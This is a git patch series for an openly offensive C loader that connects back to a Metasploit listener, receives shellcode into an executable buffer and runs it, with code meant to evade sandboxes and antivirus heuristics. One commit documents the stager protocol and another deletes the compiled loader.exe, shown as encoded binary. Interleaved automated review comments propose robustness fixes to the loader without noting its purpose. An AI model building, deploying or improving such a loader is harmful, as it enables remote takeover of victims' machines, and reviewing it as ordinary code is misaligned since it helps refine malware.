From 0b13a6180337a3091fa8395c2146b9c0d3f787c4 Mon Sep 17 00:00:00 2001 From: Arthur Moore Date: Tue, 31 Dec 2013 10:20:52 -0500 Subject: [PATCH 1/3] reverse_tcp_meterpreter(x64) Cleanup/Major Bug fix Last commit always ran reverse_tcp_meterpreter_x64. This commit folds that function into the 32 bit version. Yay for code reuse. --- main-timeobfs.c | 91 +++++++++++-------------------------------------- 1 file changed, 19 insertions(+), 72 deletions(-) diff --git a/main-timeobfs.c b/main-timeobfs.c index 7d4fe25..88b762a 100644 --- a/main-timeobfs.c +++ b/main-timeobfs.c 
@@ -132,67 +132,23 @@ int sandbox_evasion(){ //The metasploit-loader extracted into its own function. +//Works with 32 or 64 bit meterpreter depending on if ISX64 is defined or not void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){ ULONG32 size; char * buffer; void (*function)(); - winsock_init(); + #ifndef ISX64 + //Not 64 bit + int movCmdSize = 1; + int ptrSize = 4; + char movCmd[] = {0xBF}; + #else + //Is 64 bit + int movCmdSize = 2; + int ptrSize = 8; + char movCmd[] = {0x48,0xBF}; + #endif - //start the socket homie - SOCKET my_socket = wsconnect(listenerIP, listenerPort); - //receive 4 bytes which indicates the size of the next payload - int count = recv(my_socket, (char *)&size, 4, 0); - //check for issues - if (count != 4 || size <= 0) - Kick(my_socket, "bad length value\n"); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //allocate the RWX buffer - buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //check the buffer for issues - if (buffer == NULL) - Kick(my_socket, "bad buffer\n"); - //puts mov on to the front of the buffer - buffer[0] = 0xBF; - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //copies the socket pointer onto the buffer after 0xBF - //see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html - memcpy(buffer + 1, &my_socket, 4); - - //================================ - //burn out the clock, and confuse heuristics with some random number generation - genlol(); - //================================ - - //receives the rest of the data 
from the socket (based on the size received before) - count = recv_all(my_socket, buffer + 5, size); - //cast the buffer as a function? - function = (void (*)())buffer; - //execute dat meterpreter - function(); -} - - -//The metasploit-loader for 64 bit systems -void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ - ULONG32 size; - char * buffer; - void (*function)(); winsock_init(); //start the socket homie @@ -209,7 +165,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ //================================ //allocate the RWX buffer - buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + buffer = VirtualAlloc(0, size + movCmdSize + ptrSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //================================ //burn out the clock, and confuse heuristics with some random number generation @@ -220,17 +176,16 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ if (buffer == NULL) Kick(my_socket, "bad buffer\n"); //puts mov on to the front of the buffer - buffer[0] = 0x48; - buffer[1] = 0xBF; + memcpy(buffer, movCmd, movCmdSize); //================================ //burn out the clock, and confuse heuristics with some random number generation genlol(); //================================ - //copies the socket pointer onto the buffer after 0x48 0xBF + //copies the socket pointer onto the buffer after the move command //see this post for more infor http://mail.metasploit.com/pipermail/framework/2012-September/008664.html - memcpy(buffer + 2, &my_socket, 8); + memcpy(buffer + movCmdSize, &my_socket, ptrSize); //================================ //burn out the clock, and confuse heuristics with some random number generation 
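Review bot: The new `#ifndef ISX64` block hard-codes `ptrSize` to 4 or 8, but the bytes it sizes are those of `my_socket`, whose width is fixed by the compiler rather than by the macro, so a build where `ISX64` disagrees with the target makes the later `memcpy(buffer + movCmdSize, &my_socket, ptrSize)` in the `@@ -220,17 +176,16 @@` hunk read past the variable or copy too few bytes. Deriving it from the type, `int ptrSize = sizeof(SOCKET);`, removes the mismatch, and the two `movCmd` arrays should be `unsigned char`, since `0xBF` does not fit a signed `char` and the narrowing draws a compiler warning. Both values are known at compile time, so `const` (or an `enum`) would also document that they are not runtime inputs. reverse_tcp_meterpreter's body continues past the last context line of this hunk.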
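Review bot: `size + movCmdSize + ptrSize` in the new `VirtualAlloc` call can wrap: `size` is a `ULONG32` filled from the socket in the unchanged lines between the first two hunks (the removed side of the first hunk shows the `recv` that did it), and nothing visible bounds it from above, so a value near `0xFFFFFFFF` yields a tiny allocation that the later `recv_all` of `size` bytes overruns. Reject oversized lengths before the arithmetic, for instance `if (size > MAXDWORD - (movCmdSize + ptrSize)) Kick(my_socket, "bad length value\n");`, so the allocation size cannot be smaller than the length that is later received into it. The same prefix arithmetic recurs in the `@@ -238,7 +193,7 @@` hunk's `recv_all` call, so a single named `prefixLen` would keep the two in step. reverse_tcp_meterpreter starts before this hunk and ends after it.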
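Review bot: The rewritten comment `//copies the socket pointer onto the buffer after the move command` still calls the value a pointer, but the line beneath it copies the `SOCKET` handle itself as the immediate operand of the `mov` bytes written just above. A reader comparing this with the linked post gets the wrong idea about what lands in the register; `//copies the SOCKET handle value into the buffer as the immediate operand of the mov written above` says what the memcpy does. The new `memcpy(buffer, movCmd, movCmdSize)` is right only while `movCmdSize` equals `sizeof movCmd`; writing `memcpy(buffer, movCmd, sizeof movCmd);` ties the copy to the array instead of to a parallel constant. reverse_tcp_meterpreter starts before this hunk and continues after it.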
@@ -238,7 +193,7 @@ void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){ //================================ //receives the rest of the data from the socket (based on the size received before) - count = recv_all(my_socket, buffer + 10, size); + count = recv_all(my_socket, buffer + movCmdSize + ptrSize, size); //cast the buffer as a function? function = (void (*)())buffer; //execute dat meterpreter @@ -254,17 +209,9 @@ int main(int argc, char *argv[]) { //If command line parameters are given, use those instead of defaults. if(argc == 3){ - #ifdef ISX64 - reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2])); - #else - reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2])); - #endif + reverse_tcp_meterpreter(argv[1], atoi(argv[2])); }else{ - #ifdef ISX64 - reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort); - #else - reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort); - #endif + reverse_tcp_meterpreter(defaultListenerIP, defaultListenerPort); } return 0; From abece8a42b6ac3e7d9a2c5f14aa9b2e1141ab58d Mon Sep 17 00:00:00 2001 From: Arthur Moore Date: Thu, 27 Feb 2014 17:25:13 -0500 Subject: [PATCH 2/3] Added an explanation of how reverse_tcp works --- custom_meterp_bind.txt | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 custom_meterp_bind.txt diff --git a/custom_meterp_bind.txt b/custom_meterp_bind.txt new file mode 100644 index 0000000..765e8d9 --- /dev/null +++ b/custom_meterp_bind.txt 
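Review bot: The return value of the new `recv_all` call is stored in `count` but, as far as the hunk shows, never compared with `size` before the two following lines cast `buffer` to a function and call it, so a short read would transfer control into a buffer that is only partly filled. Whatever `recv_all` reports on a truncated or closed connection (its contract is not visible here), the merged function should fail closed, for instance `if (count < 0 || (ULONG32)count != size) Kick(my_socket, "short read\n");` directly after the call. `count` is declared `int` on the removed side of the first hunk and presumably still is, while `size` is a `ULONG32`, so the cast (or an unsigned `count`) is needed to avoid a signed/unsigned comparison. reverse_tcp_meterpreter starts before this hunk and its end lies beyond the last context line.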
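Review bot: Both new calls pass `atoi(argv[2])` where the parameter is an `unsigned int` port: `atoi` reports no error, returns 0 for non-numeric text and has undefined behaviour on overflow, and nothing in the hunk checks that the result lies in 1–65535 before the implicit conversion. Parse with `strtoul` and validate, for instance `char *end = NULL; unsigned long port = strtoul(argv[2], &end, 10); if (end == argv[2] || *end != '\0' || port == 0 || port > 65535) return 1;`, then pass `(unsigned int)port` in place of the `atoi` call. The `argc == 3` test is the only validation of the command line visible here. main's opening brace is in the hunk header and its closing brace lies past the last context line.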
@@ -0,0 +1,21 @@ +* connect to the handler +* read a 4-byte length +* allocate a length-byte buffer +* mark it as writable and executable (on Windows you'll need VirtualProtect for this) +* read length bytes into that buffer +* jump to the buffer. easiest way to do this in C is cast it to a function pointer and call it. + +via egypt + +Assuming x86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode: + +BF 78 56 34 12  mov edi, 0x12345678 + +For 64 bit, you have to use the RDI register (and need 10 bytes): + +48 BF 78 56 34 12 00 00 00 00 mov rdi, 0x12345678 + +PS: This is the reason why the calling convention within Metasploit is +called "sockedi" + +Via Michael Schierl \ No newline at end of file From 8f2de3fbe20521ba6466b24844edacee40b96889 Mon Sep 17 00:00:00 2001 From: Arthur Moore Date: Thu, 1 Jan 2015 16:00:14 -0500 Subject: [PATCH 3/3] Don't bother tracking compiled code. --- .gitignore | 8 +++++++- loader.exe | Bin 24868 -> 0 bytes 2 files changed, 7 insertions(+), 1 deletion(-) delete mode 100755 loader.exe diff --git a/.gitignore b/.gitignore index 092f515..1702a3a 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,9 @@ +################# +## Executable +################# +.exe +.o + ################# ## Eclipse ################# @@ -165,4 +171,4 @@ pip-log.txt # sublime text project files *.sublime-project -*.sublime-workspace \ No newline at end of file +*.sublime-workspace 
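Review bot: The two new patterns `.exe` and `.o` match only files literally named `.exe` or `.o`; gitignore patterns are not extension lists, so `loader.exe`, the very file this commit deletes, is not ignored and a later `git add .` will re-add it. They should read `*.exe` and `*.o`, matching the `*.sublime-project` form already used further down the file. The new `## Executable` heading also covers object files; `## Build output` would fit both entries.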
diff --git a/loader.exe b/loader.exe deleted file mode 100755 index 05fa672f46dff1a4fcfbeb28b67d4883b62af200..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 24868 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 wOFJk>t^KCNJ;xtgYVN^gWvZ@bZF#>F